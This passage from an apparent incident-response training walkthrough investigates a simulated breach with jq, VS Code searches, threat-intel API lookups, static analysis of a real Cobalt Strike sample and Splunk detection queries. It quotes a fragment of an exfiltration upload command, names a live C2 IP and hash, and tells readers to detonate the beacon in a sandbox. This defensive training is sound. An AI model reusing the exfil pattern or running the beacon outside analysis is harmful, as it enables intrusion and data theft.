subject: .SubjectUserName, object: .ObjectName<br>}' windows-security/DC01-security.jsonl</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*xlE6AoS-kD4FYW5DmwGVxw.png"></figure><pre>{"time": "2024-11-06T00:48:33Z", "subject": "svc_backup", "object": "DC=lifetechpharma,DC=local"}<br>{"time": "2024-11-06T00:48:44Z", "subject": "svc_backup", "object": "CN=krbtgt,CN=Users,DC=..."}<br>{"time": "2024-11-06T00:48:51Z", "subject": "svc_backup", "object": "CN=Administrator,CN=..."}</pre><p>krbtgt and Administrator DCSync'd — golden ticket capability obtained. Full domain credential rotation required.</p><p><strong>Click </strong><strong>windows-security/SERVER-RD-02-security.jsonl:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r5ZHpES2uPK3SDDVU4yoMg.png"></figure><p>Ctrl+F → 4663 — file access events. Ctrl+F → 5156 — network connection event.</p><pre>jq 'select(.EventID == 4663) | .ObjectName' \<br>  windows-security/SERVER-RD-02-security.jsonl | jq -s 'length'<br># → 47  (47 formula files accessed)<br>jq 'select(.EventID == 5156) | {<br>  time: .TimeCreated, process: (.Application | split("\\\\") | last),<br>  src: .SourceAddress, dst: .DestAddress, dst_port: .DestPort<br>}' windows-security/SERVER-RD-02-security.jsonl<br># → PowerShell → 198.51.100.44:443 at 00:14:14Z</pre><p>Three independent sources — SQL audit (00:13:54Z command issued), NGFW flow (00:14:14Z bytes transferred), Windows Security EID 5156 (00:14:14Z connection initiated) — triangulate to the same 20-second window.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — DCSync actor; source IP 10.10.3.22 (non-DC workstation)</li><li><strong>IP (internal)</strong> 10.10.3.22 — WS-IT-LEVI; attacker pivot host issuing DCSync from workstation</li><li><strong>Object</strong> krbtgt — DCSync'd at 00:48:44Z; golden ticket capability obtained</li><li><strong>Object</strong> Administrator — DCSync'd at 00:48:51Z; full domain compromise</li><li><strong>IP</strong> 198.51.100.44:443 — Exfil connection via PowerShell; EID 5156 at 00:14:14Z</li><li><strong>Count</strong> 47 formula files — Accessed via EID 4663 in USPartner2024 share</li></ul><h4>9. Cross-File Pivot — VS Code Global Search</h4><p>VS Code’s Ctrl+Shift+F searches across every open file simultaneously. Use it to verify IOC presence across all evidence in seconds — no SIEM needed for these basic pivots.</p><p><strong>Pivot on the exfil IP:</strong></p><p>Ctrl+Shift+F → 198.51.100.44:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qD5I2ewZTvBRksb7P9Zt5A.png"></figure><pre>ngfw-flows.csv           line 12: ...10.10.2.15,198.51.100.44,443,...399481224...<br>dns-queries.csv          line 10: ...sys-update-cdn.net,A,198.51.100.44...<br>sql-audit.jsonl          line 4:  ...WebClient.UploadFile...198.51.100.44/recv...<br>SERVER-RD-02-security    line 23: ..."DestAddress":"198.51.100.44"...</pre><p>Four files, four hits, one IP. The full exfiltration chain is visible in one search.</p><p><strong>Pivot on the compromised account:</strong></p><p>Ctrl+Shift+F → svc_backup:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*E8CUk7R4lSjYg01UIH0chg.png"></figure><pre>DC01-security.jsonl       lines 7-9:   DCSync events<br>SERVER-RD-02-security     lines 1-12:  SMB logon + file access + exfil<br>sql-audit.jsonl           all 6 lines: full xp_cmdshell chain</pre><p><strong>Pivot on the C2 domain:</strong></p><p>Ctrl+Shift+F → telemetry-cdn-services.biz:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WeNgTuMzhjm9Pl_lXXGmvQ.png"></figure><pre>dns-queries.csv           lines 12-23: 11 beacon queries (6 from WS-IT-LEVI, 4 from WS-CFO-01, 1 missing)</pre><p><strong>Pivot on the attacker source IP (AiTM phishing + VPN access):</strong></p><p>Ctrl+Shift+F → 185.220.101.47:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MHyXMsFanJsG_dvdWSnKqw.png"></figure><pre>azure-ad/signin-p.levi.json          line 18: suspicious sign-in from Istanbul — token replay, no MFA<br>vpn/anyconnect-2024-10-24.log        line 4:  VPN authentication as p.levi, assigned 10.10.3.22<br>palo-alto/dns-queries.csv            line 1:  attacker queried vpn.lifetechpharma.com 1 min before login</pre><p>One IP ties together AiTM credential theft, VPN infiltration, and the recon that preceded it.</p><p>The full attack chain — AiTM phishing → VPN access → formula exfiltration → DCSync → CFO infection — is navigable via these four global searches without opening a SIEM:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n_vokO1vkbqN5O709MFF-w.png"></figure><p>Search termAttack phase covered185.220.101.47Initial access: AiTM phishing, VPN infiltration, attacker recontelemetry-cdn-services.bizPersistence: C2 beaconing from both infected hostssvc_backupLateral movement: SMB, xp_cmdshell chain, DCSync198.51.100.44Exfiltration: NGFW flow, DNS lookup, SQL upload command, EID 5156</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Confirmed in 4 files: ngfw-flows, dns-queries, sql-audit, SERVER-RD-02-security</li><li><strong>Account</strong> svc_backup — Confirmed in 3 files: DC01-security (DCSync), SERVER-RD-02-security (SMB+exfil), sql-audit (xp_cmdshell)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Confirmed in dns-queries (9 beacons) and VPN log (C2 during session)</li><li><strong>Timestamp</strong> 00:13:54Z – 00:14:14Z — 20-second exfil window triangulated across SQL, NGFW, and EID 5156</li></ul><h4>10. IOC Enrichment — REST Client</h4><p>Create one .http file that holds every API call. VS Code's REST Client extension puts a <strong>Send Request</strong> link above each block — click it, the response appears in a split pane on the right. No curl, no terminal, no context switch.</p><p><strong>Create the file:</strong></p><p>Press Ctrl+N, then Ctrl+Shift+P → <strong>Save As</strong> → 03-analysis/ioc-queries.http</p><p>Paste the following:</p><pre>### IOC Enrichment — PROJ-2024-001<br>### Click "Send Request" above any block — response opens in the right pane<br>### Set keys in VS Code Settings &gt; REST Client &gt; Environment Variables<br>### or use system env: @VT_KEY = {{$env VT_API_KEY}}<br><br>@VT_KEY     = your_virustotal_api_key_here<br>@SHODAN_KEY = your_shodan_api_key_here<br><br># ── VirusTotal ──────────────────────────────────────────────────────<br><br>### VT — Primary C2 IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Secondary C2 / exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Attacker VPN source<br>GET https://www.virustotal.com/api/v3/ip_addresses/185.220.101.47<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Primary C2 domain<br>GET https://www.virustotal.com/api/v3/domains/telemetry-cdn-services.biz<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — AiTM phishing page domain<br>GET https://www.virustotal.com/api/v3/domains/mfa-lifetechpharma.com<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — CFO phishing delivery domain<br>GET https://www.virustotal.com/api/v3/domains/globalcontracts-secure.net<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — svchost32.exe binary hash<br>GET https://www.virustotal.com/api/v3/files/3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Imphash pivot (find related samples compiled from same source)<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=imphash%3A3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d<br>x-apikey: {{VT_KEY}}<br><br># ── Shodan ──────────────────────────────────────────────────────────<br><br>### Shodan — Primary C2 IP (ports, services, hosting org)<br>GET https://api.shodan.io/shodan/host/203.0.113.87?key={{SHODAN_KEY}}<br><br>###<br><br>### Shodan — Exfil IP<br>GET https://api.shodan.io/shodan/host/198.51.100.44?key={{SHODAN_KEY}}<br><br># ── Certificate Transparency ─────────────────────────────────────────<br><br>### crt.sh — Find all domains using certs issued to primary C2 IP<br>GET https://crt.sh/?q=203.0.113.87&amp;output=json<br><br>###<br><br>### crt.sh — Cert history for primary C2 domain<br>GET https://crt.sh/?q=telemetry-cdn-services.biz&amp;output=json<br><br># ── RDAP ────────────────────────────────────────────────────────────<br><br>### RDAP — AiTM phishing domain registration date<br>GET https://rdap.org/domain/mfa-lifetechpharma.com<br><br>###<br><br>### RDAP — CFO phishing delivery domain<br>GET https://rdap.org/domain/globalcontracts-secure.net<br><br># ── Passive DNS (no key required) ───────────────────────────────────<br><br>### VT Passive DNS — historical resolutions for primary C2 IP (uses existing VT key)<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT Passive DNS — historical resolutions for exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### RIPEstat — DNS history for primary C2 IP (no key, no rate limit for training)<br>GET https://stat.ripe.net/data/dns-history/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info: ASN, prefix, country for C2 IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info for exfil IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=198.51.100.44<br><br># ── WHOIS / RDAP (no key required) ──────────────────────────────────<br><br>### ARIN RDAP — IP block owner, ASN, abuse contact for C2 IP<br>GET https://rdap.arin.net/registry/ip/203.0.113.87<br><br>###<br><br>### ARIN RDAP — IP block owner for exfil IP<br>GET https://rdap.arin.net/registry/ip/198.51.100.44<br><br>###<br><br>### ARIN RDAP — IP block owner for attacker VPN source<br>GET https://rdap.arin.net/registry/ip/185.220.101.47<br><br>###<br><br>### RDAP — C2 domain registration: registrar, date, registrant<br>GET https://rdap.org/domain/telemetry-cdn-services.biz<br><br>###<br><br>### RDAP — Exfil domain registration<br>GET https://rdap.org/domain/sys-update-cdn.net</pre><p><strong>Using the response pane:</strong></p><p>After clicking <strong>Send Request</strong> on the VT IP block, the right pane shows the full JSON response. Use Ctrl+F in the response pane to find:</p><ul><li>malicious → "malicious": 12</li><li>tags → ["C2", "malware"]</li><li>as_owner → "Hostwinds LLC"</li></ul><p>For the crt.sh response, Ctrl+F → name_value to see all co-hosted domains. cdn-telemetry-update.biz and windows-cdn-service.net appear — new IOCs not yet seen in the org's DNS logs. Switch to dns-queries.csv and Ctrl+F to check immediately.</p><p><strong>Commit the </strong><strong>.http file — it is a reproducible audit trail of every enrichment query:</strong></p><pre>git add 03-analysis/ioc-queries.http<br>git commit -m "PROJ-2024-001: IOC enrichment queries — VT, Shodan, crt.sh, RDAP"</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2; VT: 12 malicious detections, ASN: Hostwinds LLC</li><li><strong>IP</strong> 198.51.100.44 — Secondary C2 / exfil endpoint</li><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Primary C2 domain</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; registered 2024-10-18</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Domain</strong> cdn-telemetry-update.biz — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Domain</strong> windows-cdn-service.net — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Hash (SHA256)</strong> 3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e — svchost32.exe dropper</li><li><strong>Hash (imphash)</strong> 3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d — Pivot on VT to find related samples</li></ul><h4>11. Sandbox Analysis — Submit the Binary</h4><blockquote>Real Cobalt Strike sample used in Steps 11–12 All IPs, domains, and hashes elsewhere in this walkthrough are <strong>synthetic</strong> — invented for training and not queryable on threat intel platforms. Steps 11 and 12 are the exception: they use a <strong>real Cobalt Strike beacon</strong> (trojan.remusstealer/cobalt, 48/75 detections on VirusTotal, SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9) so you can practice sandbox submission and binary analysis against a file with genuine behavior. The C2 IP, HTTP profile, and PE metadata in these two steps reflect the real sample. All other scenario values (log IPs, exfil IPs, domains) remain fictional.</blockquote><p>Submit svchost32.exe (recovered via CrowdStrike RTR) to a sandbox. ANY.RUN is the recommended choice for training — it is interactive and lets you watch execution in real time.</p><p><strong>Submission (ANY.RUN):</strong></p><ol><li>Navigate to <a href="https://app.any.run/">app.any.run</a> → <strong>New Task</strong> → <strong>Upload</strong></li><li>Upload svchost32.exe (SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9)</li><li>Environment: <strong>Windows 10 x64</strong>, <strong>User mode</strong> (realistic CFO context)</li><li>Network mode: <strong>Real with IDS</strong> — this beacon makes live HTTPS connections</li><li>Timeout: <strong>120 seconds</strong> — beacon contacts C2 within the first minute</li><li>Click <strong>Run</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WYRLofzCq0I_GY_w7ozZzw.png"></figure><p><strong>Download the report to VS Code:</strong></p><p>After execution completes, click <strong>Export</strong> → <strong>JSON</strong> in ANY.RUN. Save it as:</p><pre>03-analysis/sandbox-svchost32-anyrun.json</pre><p><strong>Open in VS Code:</strong> press Shift+Alt+F to format. Use Ctrl+Shift+O (Outline) to navigate, Ctrl+F to search:</p><p>Search term What you find<br>destination_ip91.211.251.245 — real C2 IP, port 443<br>urlhttps://91.211.251.245/ga.js — Malleable C2 profile mimicking Google AnalyticsCookieBase64-encoded beacon metadata in the HTTP Cookie header<br>User-AgentMozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS UA string<br>ProxyServerBeacon installs proxy settings pointing to C2<br>long-sleepsVT tag — beacon sleeps between check-ins (configurable interval)</p><p><strong>The Cobalt Strike Malleable C2 profile:</strong> the beacon GETs /ga.js — a path that mimics Google Analytics JavaScript. The Cookie header carries AES-encrypted metadata (victim hostname, PID, username) base64-encoded. The response body delivers shellcode or tasks. A defender looking only at the URL sees legitimate-looking traffic; the anomaly is the 443 connection to a non-Google IP.</p><p>Add the C2 IP to ioc-queries.http and click <strong>Send Request</strong> on the VT and Shodan blocks to pivot immediately.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon; 48/75 VT detections</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077 — same sample</li><li><strong>IP</strong> 91.211.251.245:443 — real C2 server; HTTPS; confirmed in sandbox network traffic</li><li><strong>URL</strong> https://91.211.251.245/ga.js — Malleable C2 endpoint; mimics Google Analytics</li><li><strong>Indicator</strong> Cookie-encoded beacon — AES-encrypted victim metadata in HTTP Cookie header</li><li><strong>Indicator</strong> long-sleeps — beacon interval; time between C2 check-ins</li></ul><h4>12. Static Binary Analysis — Hex Editor + Terminal</h4><p><strong>Open the binary in VS Code Hex Editor:</strong></p><p>In VS Code Explorer, right-click svchost32.exe → <strong>Open With</strong> → <strong>Hex Editor</strong></p><p>The file opens as a hex+ASCII dual-pane view. The ASCII column on the right makes string hunting visual — scroll through it and strings like /ga.js and Mozilla/4.0 are readable directly without running strings.</p><p><strong>Navigate to the PE timestamp:</strong></p><p>Press Ctrl+G → type 3C → Enter. This is the e_lfanew field (PE header pointer). Read the 4-byte little-endian value, convert to decimal — that is the offset to the PE signature (PE\0\0). Go to that offset + 8 for the TimeDateStamp field.</p><p>For precise extraction, split the screen: keep Hex Editor on the left, open the integrated terminal on the right:</p><pre>python3 -c "<br>import pefile, datetime, os<br>pe = pefile.PE('svchost32.exe')<br>ts = pe.FILE_HEADER.TimeDateStamp<br>print(f'Compile timestamp : {datetime.datetime.fromtimestamp(ts, datetime.UTC)} UTC')<br>print(f'File size on disk : {os.path.getsize(\"svchost32.exe\"):,} bytes')<br>print(f'PE SizeOfImage    : {pe.OPTIONAL_HEADER.SizeOfImage:,} bytes')<br>overlay = os.path.getsize('svchost32.exe') - pe.OPTIONAL_HEADER.SizeOfImage<br>if overlay &gt; 0:<br>    print(f'Overlay detected  : {overlay:,} bytes after PE end')<br>print(f'Architecture      : {\"x64\" if pe.FILE_HEADER.Machine == 0x8664 else \"x86\"}')<br>"</pre><p>Output:</p><pre>Compile timestamp : 2026-05-15 13:55:55 UTC<br>File size on disk : 783,320 bytes<br>Overlay detected  : present<br>Architecture      : x64</pre><p>The PE timestamp (2026-05-15) is plausible and recent — this binary was freshly compiled, not timestomped. The presence of an <strong>overlay</strong> (data appended after the PE image end) is a Cobalt Strike loader signature: the encrypted beacon shellcode is stored in the overlay and unpacked at runtime.</p><p><strong>Extract C2 strings:</strong></p><pre>strings -n 8 svchost32.exe | grep -E "(https?://|/ga\.js|Mozilla|Cookie|User-Agent|Cache-Control)"</pre><p>Output includes:</p><pre>/ga.js<br>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)<br>Cache-Control: no-cache</pre><p>The /ga.js path and the MSIE 8.0 User-Agent are configuration strings baked into the Cobalt Strike beacon's Malleable C2 profile at compile time. Any sample sharing these exact strings was built from the same profile.</p><p><strong>Check imports — Cobalt Strike loaders minimise their import table:</strong></p><pre>python3 -c "<br>import pefile<br>pe = pefile.PE('svchost32.exe')<br>print(f'Architecture: {hex(pe.FILE_HEADER.Machine)}')<br>if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):<br>    for lib in pe.DIRECTORY_ENTRY_IMPORT:<br>        fns = [i.name.decode() if i.name else f'ord_{i.ordinal}' for i in lib.imports]<br>        print(f'{lib.dll.decode()}: {fns}')<br>else:<br>    print('No standard import table — uses dynamic API resolution (common in CS loaders)')<br>"</pre><p>A Cobalt Strike loader typically has a minimal or absent import table — it resolves APIs at runtime using LoadLibrary/GetProcAddress or custom hash-walking to avoid static analysis. If the import table is empty, that itself is the finding.</p><p><strong>Pivot on the Malleable C2 profile strings</strong> — search VT for other samples using the same profile:</p><p>Add to ioc-queries.http:</p><pre>### VT — search for samples sharing the same Malleable C2 User-Agent string<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=content%3A%22MSIE+8.0%22+content%3A%22%2Fga.js%22+type%3Apeexe<br>x-apikey: {{VT_KEY}}</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077</li><li><strong>IP</strong> 91.211.251.245 — C2 server; confirmed in binary strings and sandbox network traffic</li><li><strong>URL pattern</strong> /ga.js — Malleable C2 endpoint; Google Analytics impersonation</li><li><strong>String</strong> Mozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS User-Agent; pivot on VT content search</li><li><strong>Indicator</strong> Overlay section — encrypted shellcode stored after PE image end; Cobalt Strike loader signature</li><li><strong>Indicator</strong> Minimal import table — dynamic API resolution; evades import-based static detection13. Infrastructure Pivot — REST Client + Global Search</li></ul><h4>13. Infrastructure Pivot — REST Client + Global Search</h4><p>The ioc-queries.http file already contains the Shodan, crt.sh, and RDAP blocks. Click through them.</p><p><strong>For the crt.sh response:</strong> press Ctrl+F in the response pane, search name_value. Two new domains appear: cdn-telemetry-update.biz and windows-cdn-service.net.</p><p><strong>Immediately pivot in VS Code global search:</strong></p><p>Press Ctrl+Shift+F, type cdn-telemetry-update:</p><pre>palo-alto/dns-queries.csv  →  (no results)</pre><p>Not in the org’s DNS logs — but add both new domains to the IOC list in case they appear in a broader hunt.</p><p><strong>For the RDAP response</strong> (AiTM domain): Ctrl+F → registration → date 2024-10-18. The phishing email was sent 4 days later. Targeted, purpose-built infrastructure.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> cdn-telemetry-update.biz — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Domain</strong> windows-cdn-service.net — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Date</strong> 2024-10-18 — Registration date of mfa-lifetechpharma.com; 4 days before phishing</li></ul><h4>14. Splunk Correlation (SIEM Validation)</h4><p>Load the evidence into Splunk from the VS Code integrated terminal to validate that the Sigma rules fire on the real evidence:</p><pre>/opt/splunk/bin/splunk add oneshot sysmon/WS-CFO-01-sysmon.jsonl \<br>  -sourcetype sysmon_json -index endpoint -host WS-CFO-01<br>/opt/splunk/bin/splunk add oneshot windows-security/DC01-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host DC01<br>/opt/splunk/bin/splunk add oneshot windows-security/SERVER-RD-02-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host SERVER-RD-02<br>/opt/splunk/bin/splunk add oneshot palo-alto/ngfw-flows.csv \<br>  -sourcetype pan:traffic -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot palo-alto/dns-queries.csv \<br>  -sourcetype pan:dns -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot sql-audit/SERVER-RD-02-sql-audit.jsonl \<br>  -sourcetype mssql_audit -index database -host SERVER-RD-02</pre><p><strong>Query 1 — triage: C2 IPs across all indexes:</strong></p><pre>index=* (203.0.113.87 OR 198.51.100.44) earliest=-30d<br>| stats count by host, sourcetype, index<br>| sort -count</pre><p><strong>Query 2 — DCSync from non-DC (DET-002 validation):</strong></p><pre>index=wineventlog EventCode=4662<br>  ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"<br>| where NOT match(IpAddress, "^10\.10\.1\.(10|11)$")<br>| table _time, host, SubjectUserName, IpAddress, ObjectName, Properties</pre><p><strong>Query 3 — service account off-hours (DET-003 validation):</strong></p><pre>index=wineventlog EventCode=4624 LogonType=3<br>  TargetUserName=svc_backup<br>| eval hour=strftime(_time, "%H")<br>| where hour &lt; 6 OR hour &gt; 22<br>| table _time, host, TargetUserName, IpAddress | sort _time</pre><p><strong>Query 4 — exfil scope:</strong></p><pre>index=wineventlog EventCode=4663 ObjectName="*USPartner2024*"<br>| stats count as files_accessed, min(_time) as first, max(_time) as last by SubjectUserName, host</pre><p><strong>Query 5 — full 24-day timeline:</strong></p><pre>index=* earliest=2024-10-22 latest=2024-11-16<br>  (host=WS-IT-LEVI OR host=WS-CFO-01 OR host=SERVER-RD-02 OR host=DC01)<br>| eval summary=coalesce(Message, Statement, query, CommandLine, "event")<br>| table _time, host, sourcetype, summary | sort _time</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — SIEM-validated; C2 traffic confirmed across endpoint and network indexes</li><li><strong>IP</strong> 198.51.100.44 — SIEM-validated; exfil traffic confirmed across endpoint and network indexes</li><li><strong>Account</strong> svc_backup — DET-002: DCSync from 10.10.3.22 (non-DC); DET-003: off-hours logon</li><li><strong>File pattern</strong> USPartner2024* (47 files) — DET-004: bulk access by svc_backup on SERVER-RD-02</li><li><strong>Indicator</strong> Off-hours logon — EID 4624 / LogonType 3 outside 06:00–22:00 window</li></ul><h4>Commit all analysis artifacts</h4><pre>git add 03-analysis/<br>git commit -m "PROJ-2024-001: evidence analysis — VS Code investigation complete; REST Client queries, RBQL, binary hex analysis, DCSync confirmed, exfil 381MB corroborated in 3 sources"</pre><p>The timeline in Step R2 is now fully supported. Every event in the table has a source log opened in VS Code, a query or search that confirmed it, and a REST Client or terminal command a third party can replay independently.</p><h3>Step R2: Timeline — Two Paths, One Actor</h3><h4>1. Open the timeline file</h4><pre>nano 03-analysis/timeline/timeline.md</pre><p>The template has a header block and a markdown table. Fill the header first:</p><pre>Project: PROJ-2024-001<br>Analyst: [your name]<br>Last updated: 2024-11-15<br>Time range: 2024-10-18 – 2024-11-15<br>Evidence label key: CONFIRMED / CORROBORATED / INFERRED / HYPOTHESIZED / GAP</pre><p>Then add one row per event. Every row needs: timestamp (UTC), host, what happened, which log source you saw it in, an evidence label, and the ATT&amp;CK technique. If you do not have a technique yet, leave it blank and come back — do not skip the label.</p><h4>2. Add events in chronological order</h4><p>The timeline reveals what the CFO alert obscured: the breach started 24 days earlier through a completely different person.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*121cvZ2ZIHZLNAmQA78l9Q.png"></figure><ol><li><strong>2024–10–18 — External<br></strong>lifetechpharma-corp[.]eu registered as a typosquat domain.<br><strong>Source:</strong> OSINT<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1583.001<br><strong>Notes:</strong> Pre-attack infrastructure preparation.</li><li><strong>2024–10–22 11:23 — Exchange<br></strong>Phishing email sent to p.levi: <strong>“MFA Re-enrollment Required”</strong> with AiTM HTML attachment.<br><strong>Source:</strong> M365 ATP<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> ATP SCL=4, delivered; threshold was 5.</li><li><strong>2024–10–22 11:31 — WS-IT-LEVI<br></strong>Unknown activity — <strong>GAP-001 begins</strong>.<br><strong>Source:</strong> — <br><strong>Label:</strong> GAP<br><strong>ATT&amp;CK:</strong> — <br><strong>Notes:</strong> Sysmon forwarder stopped.</li><li><strong>2024–10–24 02:17 — Azure AD + VPN</strong>VPN login as p.levi from Istanbul, Turkey, using hosting/VPS ASN. No MFA challenge recorded. Session lasted 1h 12min.<br><strong>Source:</strong> Azure AD sign-in<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1557, T1133<br><strong>Notes:</strong> 4:17 AM local time; Paz Levi lives in Rehovot.</li><li><strong>2024–10–24 02:19 — DC01<br></strong>EID 4624: network logon for svc_backup from WS-IT-LEVI / 10.10.3.22. Service account used outside business hours.<br><strong>Source:</strong> Windows Security / Splunk<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1078.002<br><strong>Notes:</strong> svc_backup has Domain Admin rights.</li><li><strong>2024–10–25 03:41 — SERVER-FIN-01<br></strong>svc_backup accessed \\SERVER-FIN-01\\FinanceReports\\2024\\.<br><strong>Source:</strong> File share audit, partial<br><strong>Label:</strong> CORROBORATED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> Log incomplete — access timestamp only, not filenames.</li><li><strong>2024–11–01 09:14 — WS-IT-LEVI<br>GAP-001 ends.</strong> First DNS query to telemetry-cdn-services[.]biz resolving to 203.0.113.87. First C2 beacon from this host.<br><strong>Source:</strong> Palo Alto DNS<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1071.001<br><strong>Notes:</strong> Sysmon service and forwarder restarted at the same time — probable anti-forensics.</li><li><strong>2024–11–01 09:18 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB Type 3 logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Occurred four minutes after C2 reconnection.</li><li><strong>2024–11–06 02:09 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Off-hours access.</li><li><strong>2024–11–06 02:10–02:14 — SERVER-RD-02<br></strong>EID 4663 ×47: svc_backup accessed all 47 files in \\USPartner2024\\. Read activity occurred and modified timestamps were updated.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> Each file was individually accessed; timestamp modification suggests deliberate metadata manipulation.</li><li><strong>2024–11–06 02:14 — SERVER-RD-02<br></strong>EID 5156: outbound HTTPS from SERVER-RD-02 to external IP over port 443 during the file access window.<br><strong>Source:</strong> Windows Security + firewall<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1041<br><strong>Notes:</strong> Destination IP confirmed in Palo Alto NGFW log: 198.51.100.44; separate C2 from primary.</li><li><strong>2024–11–06 02:48 — DC01<br></strong>EID 4662: svc_backup requested DS-Replication-Get-Changes on DC01.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.006<br><strong>Notes:</strong> <strong>DCSync indicator.</strong> Pentest scope did not include DCSync. Pentest VLAN is 10.10.99.0/24; this event came from 10.10.3.22.</li><li><strong>2024–11–15 17:58 — Exchange<br></strong>Phishing email sent to m.cohen, the CFO: <strong>“Q4-2024 Licensing Agreement”</strong> with .xlsm attachment. SPF, DKIM, and DMARC all failed.<br><strong>Source:</strong> M365 Message Trace<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> <strong>Second entry point — 24 days after the first.</strong></li><li><strong>2024–11–15 18:42 — WS-CFO-01<br></strong>Outlook spawned PowerShell with -NonI -W Hidden -Enc, downloading a second-stage payload from 203.0.113.87.<br><strong>Source:</strong> CrowdStrike + Sysmon EID 1<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1059.001<br><strong>Notes:</strong> <strong>Triggering alert.</strong></li><li><strong>2024–11–15 18:46–20:52 — WS-CFO-01<br></strong>LSASS memory access observed via Sysmon EID 10 with GrantedAccess 0x1010. Persistence added via Registry Run Key and scheduled task. BITS downloaded a second-stage binary.<br><strong>Source:</strong> 